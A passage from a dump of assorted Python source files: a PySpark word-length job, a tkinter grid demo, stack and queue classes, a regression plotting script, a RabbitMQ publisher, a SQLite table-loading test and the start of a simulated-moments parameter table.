\")\n\n    # 3. We get rid of chars not being either a letter or a \" \"\n    index = len(line) - 1\n\n    # 3.1. We traverse all characters\n    while (index >= 0):\n        # 3.1.1. We get the ord of the character at position index\n        char_val = ord(line[index])\n\n        # 3.1.2. 
If (1) char_val is not \" \" and (2) char_val is not an Upper Case letter and (3) char_val is not a Lower Case letter\n if ( ( char_val != 32) and ((char_val < 65) or (char_val > 90)) and ((char_val < 97) or (char_val > 122)) ):\n # 3.1.2.1. We remove the index from the sentence\n line = line[:index] + line[(index+1):]\n # 3.1.3. If the character was an upper case letter\n elif ((char_val >= 65) and (char_val <= 90)):\n # 3.1.3.1. We add it as lower case\n line = line[:index] + chr(char_val + 32) + line[(index + 1):]\n\n # 3.1.4. We continue with the next index\n index = index - 1\n\n # 4. We get the list of words\n res = line.split(\" \")\n\n index = len(res) - 1\n\n # 4.1. We traverse the words\n while (index >= 0):\n # 4.1.1. If it is empty, we remove it\n if (res[index] == ''):\n del res[index]\n\n # 4.1.2. We continue with the next word\n index = index - 1\n\n # 5. We return res\n return res\n\n# ------------------------------------------\n# FUNCTION my_main\n# ------------------------------------------\ndef my_main(sc, my_dataset_dir, my_result_dir):\n # 1. Operation C1: Creation 'textFile', so as to store the content of the dataset contained in the folder dataset_dir into an RDD.\n # If the dataset is big enough, its content is to be distributed among multiples nodes of the cluster.\n # The operation reads the files of the folder line by line. Thus, each item of the RDD is going to be a String (the content of the line being read).\n\n # C1: textFile\n # dataset -------------> inputRDD --- RDD items are String ---\n\n inputRDD = sc.textFile(my_dataset_dir)\n\n # 2. Operation T1: Transformation 'flatMap', so as to get a new RDD ('allWordsRDD') with all the words of inputRDD.\n\n # We apply now a lambda expression as F to bypass each item of the collection to our actual filtering function F2 requiring more than\n # one argument. The function F2 is process_line, which cleans the lines from all bad_chars and splits it into a list of words.\n # We apply flatMap instead of map as we are not interested in the words of each line, just the words in general.\n # Thus, map would have given us an RDD where each item had been a list of words, the list of words on each line (i.e., each item had been [String]).\n # On the other hand, flatMap allows us to flat the lists and get instead an RDD where each item is a String, a word of the dataset.\n\n # C1: textFile\n # dataset -------------> inputRDD --- RDD items are String ---\n # |\n # | T1: flatMap\n # |------------> all_wordsRDD --- RDD items are String ---\n\n allWordsRDD = inputRDD.flatMap(process_line)\n\n # 3. Operation T2: Transformation 'map', so as to get a new RDD ('pairWordsRDD') with a pair (letter, length of word) per word of the dataset.\n\n # Having the entire word for each word of the dataset is useless for us. 
Indeed, what we are interested into is just:\n # - The first letter (as we are outputting the average length per letter of the alphabet in the solution later on).\n # - The length of the word itself (as it is useful to us to compute such this average size).\n # Also, moving from an RDD it single String items into one of pairs (key, value) with key the letter and value the length of the word seems to be\n # a step in the right direction, as later one we can manipulate this (key, value) pairs with some of the pair RDD transformations and actions.\n\n # C1: textFile\n # dataset -------------> inputRDD --- RDD items are String ---\n # |\n # | T1: flatMap\n # |------------> allWordsRDD --- RDD items are String ---\n # |\n # | T2: map\n # | ---------> pairWordsRDD --- RDD items are (char, int) ---\n\n pairWordsRDD = allWordsRDD.map( lambda x: (x[0], len(x)) )\n\n # 4. Operation T3: Transformation 'combineByKey', so as to get a new RDD ('letterTotalInfo') with a pair (letter, (num_letters, num_words)) per\n # letter of the alphabet.\n\n # The transformation operation 'combineByKey' requires as arguments 3 functions:\n\n # F1: To be applied in parallel to each node of the cluster.\n # The function is responsible of answering this question:\n # How do you want Spark to process the first (key, value) pair for each key k ?\n\n # If a node contains 1000 entries (key, value) with key 'k', F1 will only be applied once, for the first (key, value) found.\n # F1 must receive as input 1 parameter: The value of the (key, value) pair.\n # F1 must produce as an output 1 parameter: The accumulator accum generated for the pair (key, accum), created after\n # processing the first (key, value).\n\n # F2: To be applied in parallel to each node of the cluster.\n # The function is responsible of answering this question:\n # How do you want Spark to process all (key, value) pairs for each key k after having processed the first one and have got an accumulator ?\n\n # If a node contains 1000 entries (key, value) with key 'k', F2 will be applied 999 times, for all except the first (key, value) found.\n # F2 must receive as input 2 parameters:\n # - The accumulor generated until now.\n # - The value of the new (key, value) pair being found.\n # F2 must produce as an output 1 parameter: The updated accumulator, after aggregating it with the new (key, value) being found.\n\n # F3: To be applied as a whole single process through all nodes of the cluster.\n # The function is responsible of answering this question:\n # How do you want Spark to process all (key, accumulator) pairs so as to get a whole single (key, accumulator) pair ?\n\n # If combineByKey is applied to n nodes, F3 will be applied n-1 times, to merge all accumulators under a single accumulator.\n # F3 must receive as input 2 parameters:\n # - The meta-accumulor generated until now.\n # - The accumulator generated by node i, being processed now.\n # F3 must produce as an output 1 parameter: The updated accumulator, after aggregating it with the new (key, accumulator) being found.\n\n # C1: textFile\n # dataset -------------> inputRDD --- RDD items are String ---\n # |\n # | T1: flatMap\n # |------------> allWordsRDD --- RDD items are String ---\n # |\n # | T2: map\n # | ---------> pairWordsRDD --- RDD items are (char, int) ---\n # |\n # | T3: combineByKey\n # |-------------------> letterTotalInfoRDD --- RDD items are (char, (int, int))\n\n letterTotalInfoRDD = pairWordsRDD.combineByKey(lambda x: (x, 1),\n lambda x, y: (x[0] + y, x[1] + 1),\n lambda x, y: (x[0] + 
y[0], x[1] + y[1])\n )\n\n # 5. Operation T4: Transformation 'mapValues', so as to get the average for letter in a new RDD ('solutionRDD').\n\n # We are nearly there. combineByKey has given us pretty much the results we needed. All it is left is to pass from the current accumulator per key\n # (letter, (num_letters, num_words)) to a new simple accumulator (letter, num_letters / num_words).\n # As we are not going to modify the key of each (key, value) pair, we apply the function mapValues instead of map.\n\n # C1: textFile\n # dataset -------------> inputRDD --- RDD items are String ---\n # |\n # | T1: flatMap\n # |------------> allWordsRDD --- RDD items are String ---\n # |\n # | T2: map\n # | ---------> pairWordsRDD --- RDD items are (char, int) ---\n # |\n # | T3: combineByKey\n # |-------------------> letterTotalInfoRDD --- RDD items are (char, (int, int))\n # |\n # | T4: mapValues\n # |----------------> solutionRDD --- RDD items are (char, float) ---\n\n solutionRDD = letterTotalInfoRDD.mapValues(lambda value: (value[0] * 1.0) / (value[1] * 1.0))\n\n # 6. Operation A1: Store the RDD solutionRDD into the desired folder from the DBFS.\n # Each node containing part of solutionRDD will produce a file part-XXXXX with such this RDD subcontent, where XXXXX is the name of the node.\n # Besides that, if the writing operation is successful, a file with name _SUCCESS will be created as well.\n\n # C1: textFile\n # dataset -------------> inputRDD --- RDD items are String ---\n # |\n # | T1: flatMap\n # |------------> allWordsRDD --- RDD items are String ---\n # |\n # | T2: map\n # | ---------> pairWordsRDD --- RDD items are (char, int) ---\n # |\n # | T3: combineByKey\n # |-------------------> letterTotalInfoRDD --- RDD items are (char, (int, int))\n # |\n # | T4: mapValues\n # |----------------> solutionRDD --- RDD items are (char, float) ---\n # |\n # | A1: saveAsTextFile\n # |--------------------> DBFS New Folder\n\n solutionRDD.saveAsTextFile(my_result_dir)\n\n # Extra: To debug the program execution, you might want to this three lines of code.\n # Each of them apply the action 'take', taking a few elements of each RDD being computed so as to display them by the screen.\n\n # resVAl = solutionRDD.take(10)\n # for item in resVAl:\n # print(item)\n\n\n# --------------------------------------------------------\n#\n# PYTHON PROGRAM EXECUTION\n#\n# Once our computer has finished processing the PYTHON PROGRAM DEFINITION section its knowledge is set.\n# Now its time to apply this knowledge.\n#\n# When launching in a terminal the command:\n# user:~$ python3 this_file.py\n# our computer finally processes this PYTHON PROGRAM EXECUTION section, which:\n# (i) Specifies the function F to be executed.\n# (ii) Define any input parameter such this function F has to be called with.\n#\n# --------------------------------------------------------\nif __name__ == '__main__':\n # 1. We use as many input arguments as needed\n pass\n\n # 2. Local or Databricks\n local_False_databricks_True = True\n\n # 3. We set the path to my_dataset and my_result\n my_local_path = \"../../../\"\n my_databricks_path = \"/\"\n\n my_dataset_dir = \"FileStore/tables/1_Spark_Core/my_dataset/\"\n my_result_dir = \"FileStore/tables/1_Spark_Core/my_result\"\n\n if local_False_databricks_True == False:\n my_dataset_dir = my_local_path + my_dataset_dir\n my_result_dir = my_local_path + my_result_dir\n else:\n my_dataset_dir = my_databricks_path + my_dataset_dir\n my_result_dir = my_databricks_path + my_result_dir\n\n # 4. 
We remove my_result directory\n if local_False_databricks_True == False:\n if os.path.exists(my_result_dir):\n shutil.rmtree(my_result_dir)\n else:\n dbutils.fs.rm(my_result_dir, True)\n\n # 5. We configure the Spark Context\n sc = pyspark.SparkContext.getOrCreate()\n sc.setLogLevel('WARN')\n print(\"\\n\\n\\n\")\n\n # 6. We call to our main function\n my_main(sc, my_dataset_dir, my_result_dir)\n","sub_path":"Big_Data/L15-25_Spark_Environment/Workspace/1_Spark_Core/6_Text_File_Examples/p25_average_length_of_words.py","file_name":"p25_average_length_of_words.py","file_ext":"py","file_size_in_byte":14595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"304573461","text":"#!/usr/bin/env python3\n\"\"\"\nA harmadik...\n\nA 2nd_window1.py alapján készül. Egy 4x4-es grid létrehozása a feladvány,\nnémi dekorációval, a rács elemei Button ojjektumok.\nA grid() sticky paramétere adja meg, hogy melyik oldalon ragadjon a cella oldala,\nha változik a cellát tartalmazó widget mérete. (N=North, S=South, W=West, E=East -\namennyiben két szemben lévő oldalt egyszerre állítok be, akkor abban az irányban\na konténer méretének változásakor a widget mérete is változik, NS esetében a függőleges,\nWE esetében a vízszintes, NSWE esetében minden irányban)\n\"\"\"\n\n\nimport tkinter as tk\n\n\nclass MyApplication(tk.Frame):\n\n def __init__(self, root_window):\n super().__init__(root_window)\n self.run_flag = False\n\n def add_cells(self):\n if self.run_flag:\n return\n self.run_flag = True\n for i in range(0, 4):\n for j in range(0, 4):\n self.columnconfigure(i, weight=1)\n self.rowconfigure(j, weight=1)\n widget = tk.Button(self, text=\"{}x{}\".format(i,j))\n widget.grid(column=i, row=j, sticky=\"WE\", padx=4, pady=4)\n\n\ndef app_start():\n root = tk.Tk()\n root.geometry(\"800x600\")\n app_object = MyApplication(root)\n app_object.config(relief=tk.GROOVE, bd=3, background=\"#AAAAFF\")\n app_object.pack(padx=5, pady=5, ipadx=5, ipady=5, expand=tk.Y, fill=tk.BOTH)\n app_object.add_cells()\n root.mainloop()\n\n\nif __name__ == \"__main__\":\n app_start()\n","sub_path":"3rd_cells.py","file_name":"3rd_cells.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"141256986","text":"class queue:\n\thead = 0\n\ttail = 0\n\tdef __init__(self,n):\n\t\tself.queue = [None]*n\n\tdef enqueue(self,x):\n\t\tself.queue[self.tail]=x\n\t\tif self.tail == len(self.queue)-1:\n\t\t\tself.tail = 0\n\t\telse:\n\t\t\tself.tail +=1\n\tdef dequeue(self):\n\t\tx = self.queue[self.head]\n\t\tif self.head == len(self.queue)-1:\n\t\t\tself.head = 0\n\t\telse:\n\t\t\tself.head +=1\n\t\treturn x\n\n\nclass stack:\n\ttop = 0\n\tdef __init__(self,n):\n\t\tself.stack = [None]*n\n\t\tself.n = n\n\n\tdef stack_empty(self):\n\t\tif self.top == 0:\n\t\t\treturn True\n\t\telse:\n\t\t\tFalse\n\tdef pop(self):\n\t\tif self.stack_empty():\n\t\t\treturn 'underflow'\n\t\telse:\n\t\t\tself.top-=1\n\t\t\treturn self.stack[self.top]\n\tdef push(self,x):\n\t\tif self.top == self.n:\n\t\t\treturn 'overflow'\n\t\telse:\n\t\t\tself.stack[self.top] = x\n\t\t\tself.top+=1\n","sub_path":"datastructures/StackandQueueClass.py","file_name":"StackandQueueClass.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"204092183","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 22 11:18:39 2018\n\n@author: 
Ayushi\n\"\"\"\n\nimport re\n\n\n\n# re.compile converts regex pattern to variable,\n# and makes it easier to reuse\nregex = re.compile(r'[+-]?\\d*[\\.][\\d]+')\n\nlst = []\n## Search \nwhile True:\n string1 = input()\n if not string1:\n break\n\n# Gets the string from where the match is found\n response = regex.search(string1)\n if response:\n lst.append(True)\n # The groups contain the matched values.\n # It always returns the fully matched string\n #print(\"True\")\n else:\n lst.append(False)\n #print (\"False\")\n \n \nfor i in lst:\n print(i)","sub_path":"day9/float number.py","file_name":"float number.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"318222122","text":"#!/usr/bin/env python\n\nimport assignment1 as a1\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\n(countries, features, values) = a1.load_unicef_data()\n\ntargets = values[:,1]\nx = values[:,7:]\n\n\n#x = a1.normalize_data(x)\n\nN_TRAIN = 100;\n# Select a single feature for training both training inputs and training targets\nx_train = x[0:N_TRAIN,10]\nt_train = targets[0:N_TRAIN]\n\n#Selecting a feature for test both test inputs and test targets\n\nx_test=x[N_TRAIN:,10]\nt_test=targets[N_TRAIN:]\n\n## --- For debugging diagnostics, feel free to comment out\n#print(\"Value of x: \",x)\n#print(\"x_train vector \",x_train)\n#print(\"t_train vector \",t_train)\n#x_train2=x[0:N_TRAIN,0]\n#print(\"value of values[0:N_TRAIN,0]\",x_train2)\n\n#### Begin code to display bar plot\n\nnumber_of_input_features=8\n\n## List to store our input features for training\nfeature_list_input_train=[]\nfor i in range(number_of_input_features):\n #print(\"Value of i: \",i)\n #print(\"Value at x[0:N_TRAIN,\",i,\" ] \",x[0:N_TRAIN,i])\n feature_list_input_train.append(x[0:N_TRAIN,i])\n\n## List to store our test inputs for test validation\nfeature_list_target_test=[]\nfor i in range(number_of_input_features):\n feature_list_target_test.append(x[N_TRAIN:,i])\n\nprint(\"---Printing element list from feature list---\")\n\nprint(\"Target dimensions: \",t_train.shape[0],t_train.shape[1])\nlenArg=len(feature_list_input_train)\n\n# List to store the following as elements (weights,trainingerror)\nwerr=[]\nfor i in range(lenArg):\n (w,tr_err)=a1.linear_regression(feature_list_input_train[i],t_train,\"polynomial\",0,3)\n tup=(w,tr_err)\n werr.append(tup)\n #print(feature_list[i].shape[0])\n #print(feature_list[i].shape[1])\n\n#for j in range(len(werr)):\n #print(werr[j][0])\n\n\n### List to store the following as elements (estimates, te_err)\nlstZ=[]\nfor i in range(lenArg):\n (t_est,te_err)=a1.evaluate_regression(feature_list_target_test[i],t_test,werr[i][0],\"polynomial\",3)\n tup2=(t_est,te_err)\n lstZ.append(tup2)\n\n## Note: technically we do not need these list variables but we put them there for code readability\ntraining_error_list=[]\ntest_error_list=[]\nfor i in range(lenArg):\n #print(\"training error, test error: \",werr[i][1],lstZ[i][1])\n training_error_list.append(werr[i][1])\n test_error_list.append(lstZ[i][1])\n\n### To do on above: refactor when have time\n\n\"\"\" Code for barplot comment out to see barplot\"\"\"\n\nn_features=8\nfig,ax=plt.subplots()\nindex=np.arange(n_features)\nbar_width=0.35\nopacity=0.8\n\nrects1=plt.bar(index,training_error_list,bar_width,alpha=opacity,color='b',label='training error')\nrects2=plt.bar(index+bar_width,test_error_list,bar_width,alpha=opacity,color='g',label='test 
error')\n\nplt.xlabel('Feature')\nplt.ylabel('Error')\nplt.title('Errors for each feature')\nplt.xticks(index+bar_width,('8f1','9f2','10f3','11f4','12f5','13f6','14f7','15f8'),rotation=170)\nplt.legend()\n\nplt.tight_layout()\nplt.show()\n\n\n\n\n#print(\"Value of min(x_train): \")\n#print(min(x_train))\n#print(\"Value of max(x_train): \")\n#print(max(x_train))\n\n####\n\n\n\n# Plot a curve showing learned function.\n# Use linspace to get a set of samples on which to evaluate\n\n### Begin code to plot actual polynomial\nx_ev = np.linspace(np.asscalar(min(x_train)), np.asscalar(max(x_train)), num=500)\n#x_ev_col=x_ev[:np.newaxis]\nx_ev_col=x_ev.reshape((500,1))\ny_dummy=np.ones((x.shape[0],1))\n\n\n#print(\"x_ev\",x_ev)\n#for i in range(3):\n\n\n\n#weight_list=[]\n#for i in range(3,6):\n #(w,tr_err)=a1.linear\n\n## List to store our list of features\nf_list=[]\nfor i in range(3,6):\n f_list.append(x[0:N_TRAIN,i])\n\n### List to store our interval of x coordinates\n\n\n\nco_ords=[]\n#min=min(x[0:N_TRAIN,3])\n\n#print(min)\nfor i in range(3,6):\n #print(\"i\",i)\n min=np.amin(x[0:N_TRAIN,i])\n max=np.amax(x[0:N_TRAIN,i])\n #print(min)\n #print(max)\n #print(\"i: \",i)\n #print(x[0:N_TRAIN,i])\n #print(min)\n #print(max)\n\n x_ev=np.linspace(np.asscalar(min),np.asscalar(max),num=500)\n #print(x_ev)\n #x_ev_col=x_ev[:np.newaxis]\n x_ev_col=x_ev.reshape((500,1))\n co_ords.append(x_ev_col)\n\n\n\n## List to store our test inputs for testing | and later plotting\nf_lst_input=[]\nfor i in range(3,6):\n f_lst_input.append(x[N_TRAIN:,i])\n\n##List to store our test targets for testing | and later plotting\n\n\n# List to store the following as elements (weights,trainingerror)\n\nweighterror=[]\nlength=len(f_list)\n\nfor i in range(length):\n #print(\"Inside weight error loop: \")\n #print(f_list[i])\n (weights,trainingerror)=a1.linear_regression(f_list[i],t_train,\"polynomial\",0,3)\n tup=(weights,trainingerror)\n weighterror.append(tup)\n\n#print(\"weighterror[0]\",weighterror[0])\n#r=weighterror[0][0].dot(x_ev)\n#for i in range(len(weighterror)):\n #print(\"Weight set: \")\n #print(weighterror[i][0])\n#List to store the following as elements (estimates, te_err)\n\n#estlist=[]\n#for i in range(length):\n #(estimates,te_err)=a1.evaluate_regression(feature_list_target_test[i],t_test,weighterror[i][0],\"polynomial\",3)\n #tup=(estimates,te_err)\n #estlist.append(tup)\n\ntrain_error=[]\ntest_error=[]\n\nfor i in range(length):\n train_error.append(weighterror[i][1])\n #test_error.append(estlist[i][1])\n\n## Create a y_dummy vectors full of ones to compute y estimates for each feature \n\nfor i in range(length):\n print(\"Value of i in weighterror loop:\",i)\n print(weighterror[i][0])\n\ny_dummy_vec=[]\nfor i in range(3):\n y_dummy=np.ones((co_ords[i].shape[0],1))\n y_dummy_vec.append(y_dummy)\n\n### Evaluate regression on plotting points using previously computed weights\n\n#y_ev_vec=[]\n#for j in range(3):\n #print(\"Value of j: \",j)\n #print(co_ords[i].shape[0])\n #print(y_dummy_vec[i].shape[0])\n #print(weighterror[i][0])\n #print(\"Value of j: \",j)\n #print(co_ords[j])\n\n #for k in range(co_ords[j].shape[0]):\n #print(co_ords[j][k])\n #y_ev,_=a1.evaluate_regression(co_ords[i],y_dummy_vec[i],weighterror[i][0],\"polynomial\",3)\n #y_ev_vec.append(y_ev)\n\nreversecoeffs=[]\nfor j in range(3):\n coeffs=np.flip(weighterror[i][0],0)\n reversecoeffs.append(coeffs)\n\n#print(reversecoeffs[0])\ny_ev_vec=[]\nfor k in range(3):\n #y_ev=np.polyval(reversecoeffs[k],co_ords[k])\n print(co_ords[k].shape[0])\n \n 
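# note (added; not in the original file): evaluate the learned degree-3 polynomial on the 500 plotting samples; targets are passed as None since only the estimates are used here\n    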
y_ev=a1.evaluate_regression(co_ords[k],None,weighterror[k][0],\"polynomial\",3)\n y_ev_vec.append(y_ev)\n\n#print(type(y_ev_vec[0]))\n\n#print(\"The contents of x_ev are: \")\n#print(x_ev)\n# TO DO:: Put your regression estimate here in place of x_ev.\n# Evaluate regression on the linspace samples.\n# y_ev, _ = a1.evaluate_regression()\n\n#print(len(y_ev_vec[0]))\n\nfor i in range(3):\n print(i)\n\n\nplt.figure(200)\nprint(co_ords[0].shape[0])\nprint(co_ords[0].shape[1])\nprint(\"y_ev_vec[0][0]\",y_ev_vec[0][0])\nprint(\"y_ev_vec[0][0].shape[0]\",y_ev_vec[0][0].shape[0])\n#print(y_ev_vec[0])\n\nplt.title(\"Plot of learned polynomial against datapoints\")\nplt.plot(co_ords[0],y_ev_vec[0][0],'r.-')\nplt.plot(f_list[0],t_train,'bo')\nplt.plot(f_lst_input[0],t_test,'go')\nplt.show()\n\nplt.figure(300)\nplt.title(\"Plot of learned polynomial against datapoints\")\nplt.plot(co_ords[1],y_ev_vec[1][0],'r.-')\nplt.plot(f_list[1],t_train,'bo')\nplt.plot(f_lst_input[1],t_test,'go')\nplt.show()\n\nplt.figure(400)\nplt.title(\"Plot of learned polynomial against datapoints\")\n#plt.legend(\"Function\",\"Points\")\nplt.plot(co_ords[2],y_ev_vec[2][0],'r-')\nplt.plot(f_list[2],t_train,'bo')\nplt.plot(f_lst_input[2],t_test,'go')\nplt.show()\n\n\n\"\"\"\n\nplt.plot(x_ev,y_ev,'r.-')\nplt.plot(x_train,t_train,'bo')\nplt.title('A visualization of a regression estimate using random outputs')\nplt.show()\n\n\"\"\"\n\n\n\n","sub_path":"Assignment1/code/visualize_1d.py","file_name":"visualize_1d.py","file_ext":"py","file_size_in_byte":7550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"126706502","text":"\"\"\" Utility function for vizex \"\"\"\n\nfrom math import ceil\nfrom colored import fg, attr, stylize\n\ndef bytes_to_human_readable(bytes: int, suffix='B') -> str:\n \"\"\"\n Converts bytes into the appropriate human\n readable unit with a relevant suffix.\n \"\"\"\n for unit in ['','K','M','G','T','P','E','Z']:\n if abs(bytes) < 1024.0:\n return f'{bytes:3.1f} {unit}{suffix}'\n bytes /= 1024.0\n return f'{bytes:.1f} {\"Y\"}{suffix}'\n\ndef ints_to_human_readable(disk: dict) -> dict:\n \"\"\"\n Converts the dictionary of integers\n into the human readable strings.\n \"\"\"\n result = {}\n try:\n for key in disk:\n result[key] = bytes_to_human_readable(disk[key])\n except:\n result[key] = disk[key]\n return result\n\ndef printml(folder: list, cols: int = 1) -> None:\n \"\"\"Prints multiline strings side by side.\"\"\"\n size = len(folder)\n incr = ceil(size / cols)\n end, start = 0, 0\n while True:\n if end >= size:\n break\n end += incr\n # Check if the end index exceeds the last index\n if end > size:\n end = size\n lines = [folder[i].splitlines() for i in range(start, end)]\n for line in zip(*lines):\n print(*line, sep=' ')\n print()\n start = end","sub_path":"src/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":1297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"634601221","text":"import mysql.connector\nimport numpy as np\nimport matplotlib.pyplot as plt \n\nsql = \"\"\"select \n\tdiseaseName,\n\tscore,\n\t(select featureselectionname from classifierresults where macrof1score = score limit 1) as featureName\nfrom (\nselect\n\tdiseaseName,\n\tmax(MacroF1Score) as score\nfrom classifierresults\nwhere source is null\ngroup by diseasename\nunion\nselect\n\tdiseaseName,\n\tMacroF1Score as score\nfrom classifierresults\nwhere source is null \nand FeatureSelectionName = 'mallet 
custom count baseline'\n) b\norder by DiseaseName asc, featureName asc\n\"\"\"\n\nfeatureNameHash = {\n\t\"mallet custom count baseline\":\"bl\",\n\t\"subjectiveComplexFeature\":\"sc\",\n\t\"subjectiveDiseaseUniqueFeature\":\"sdu\",\n\t\"subjectiveSimpleFeature\":\"ss\",\n\t\"subjectiveWordComplexFeature\":\"swc\",\n\t\"highestProbFeature\":\"hp\"\n}\n\ndef get(connection):\n\tcursor = connection.cursor(buffered=True)\n\n\tX = []\n\tY = []\n\n\tcursor.execute(sql)\n\n\tfor row in cursor:\n\t\tdiseaseName = row[0]\n\t\tscore = float(row[1])\n\t\tfeatureName = row[2]\n\n\t\tX.append(\"%s %s\" % (diseaseName, featureNameHash[featureName]))\n\t\tY.append(score)\n\n\tfig = plt.figure()\n\n\twidth = .99\n\tind = np.arange(len(Y))\n\tplt.bar(ind, Y)\n\tplt.xticks(ind + width / 2, X)\n\tfig.autofmt_xdate()\n\n\tplt.savefig(\"results.pdf\")","sub_path":"source/loading/graphPlot.py","file_name":"graphPlot.py","file_ext":"py","file_size_in_byte":1216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"227138723","text":"from setuptools import setup\nfrom codecs import open\nfrom os import path\nhere = path.abspath(path.dirname(__file__))\n\nwith open(path.join(here, 'README.rst'), encoding='utf-8') as f:\n    long_description = f.read()\n\nsetup(name='pycsvdb',\n      version='2.3',\n      description='Reading CSV file and insert into database',\n      long_description=long_description,\n      url='https://github.com/sajeeshe/python-csv-easy',\n      author='Sajeesh E Namboothiri',\n      author_email='sajeeshe@gmail.com',\n      license='MIT',\n      packages=['pycsvdb'],\n      keywords='CSV database pandas',\n      zip_safe=False)\n","sub_path":"pypi_install_script/pycsvdb-2.3.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"260142111","text":"#!/usr/bin/env python\nimport pika\n# publisher (translated from Chinese)\n\nconnection = pika.BlockingConnection(pika.ConnectionParameters(host='172.16.8.47'))\nchannel = connection.channel() # create the channel\n\nchannel.exchange_declare(exchange='direct_name',type='direct')# type='direct' routes messages by routing key\n\nmessage = \"Hello World!\"\n\nchannel.basic_publish(exchange='direct_name',# target exchange: messages go to the exchange, which forwards them to the queues bound to it\n                      routing_key='lisi',# the routing key\n                      body=message)\nprint(\"Sent %r\" % message)\nconnection.close()\n","sub_path":"day_10/rabbitmq_a/rabbitmq_send.py","file_name":"rabbitmq_send.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"238382024","text":"# encoding: utf-8\n\n\"\"\"\n.. 
codeauthor:: Tsuyoshi Hombashi <gogogo.vm@gmail.com>\n\"\"\"\n\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport os\n\nimport pytest\nfrom simplesqlite import SimpleSQLite\n\nimport pytablereader as ptr\nimport pytablewriter as ptw\n\n\nclass Test_SimpleSQLite_create_table_from_tabledata:\n\n @pytest.mark.parametrize([\"filename\"], [\n [\"python - Wiktionary.html\"],\n ])\n def test_smoke(self, tmpdir, filename):\n p = tmpdir.join(\"tmp.db\")\n con = SimpleSQLite(str(p), \"w\")\n\n test_data_file_path = os.path.join(\n os.path.dirname(__file__), \"data\", filename)\n loader = ptr.TableFileLoader(test_data_file_path)\n\n success_count = 0\n\n for tabledata in loader.load():\n if tabledata.is_empty():\n continue\n\n print(ptw.dump_tabledata(tabledata))\n\n try:\n con.create_table_from_tabledata(\n ptr.SQLiteTableDataSanitizer(tabledata).sanitize())\n success_count += 1\n except ValueError as e:\n print(e)\n\n con.commit()\n\n assert success_count > 0\n","sub_path":"test/test_from_file.py","file_name":"test_from_file.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"332609984","text":"\"\"\"Functions for use in the Method of Simulated Moments.\"\"\"\nimport numpy as np\nimport pandas as pd\nimport respy as rp\nfrom linearmodels.panel import PanelOLS\n\nfrom auxiliary.helper import *\n\n\ndef params_description(return_descriptives=False, return_toyestimates=False):\n \"\"\"Provides the relevant unknown parameters and trial values.\n\n The trial values are computed as the mean of the upper and the lower bound which are also reported.\n\n Returns\n ---------------\n return_descriptives=False(default):\n Returns Pandas DataFrame with values and bounds of the parameters\n\n return_descriptives=True:\n Returns Pandas DataFrame with comments regarding the parameter\n \"\"\"\n data = {\n \"category\": [\n \"lambda\",\n \"lambda\",\n \"cost_of_effort\",\n \"cost_of_effort\",\n \"cost_of_effort\",\n \"cost_of_effort\",\n \"cost_of_effort\",\n \"cost_of_effort\",\n \"cost_of_effort\",\n \"cost_of_effort\",\n \"cost_of_effort\",\n \"cost_of_effort\",\n \"cost_of_effort\",\n \"cost_of_effort\",\n \"cost_of_effort\",\n \"cost_of_effort\",\n \"cost_of_effort\",\n ],\n \"name\": [\n \"lambda\",\n \"std_lambda\",\n \"phi_pi\",\n \"varphi_pi\",\n \"phi_mu\",\n \"varphi_mu\",\n \"kappa\",\n \"b\",\n \"delta_2\",\n \"delta_3\",\n \"delta_4\",\n \"delta_5\",\n \"delta_6\",\n \"delta_7\",\n \"delta_8\",\n \"delta_9\",\n \"delta_10\",\n ],\n \"comment\": [\n \"strength of disappointment aversion on average\",\n \"standard deviation of strength of disappointment aversion\",\n \"unobserved differences in cost of effort functions that vary over rounds and individuals\",\n \"unobserved differences in cost of effort functions that vary over rounds and individuals\",\n \"unobserved differences in cost of effort functions between individuals, constant over rounds\",\n \"unobserved differences in cost of effort functions between individuals, constant over rounds\",\n \"common cost parameter\",\n \"common cost parameter\",\n \"round effects for round 2\",\n \"round effects for round 3\",\n \"round effects for round 4\",\n \"round effects for round 5\",\n \"round effects for round 6\",\n \"round effects for round 7\",\n \"round effects for round 8\",\n \"round effects for round 9\",\n \"round effects for round 10\",\n ],\n \"lower\": [1, 0.5, 0, 0.2, 0, 0.2, 1, -35, -1, -1, -1, -1, -1, 
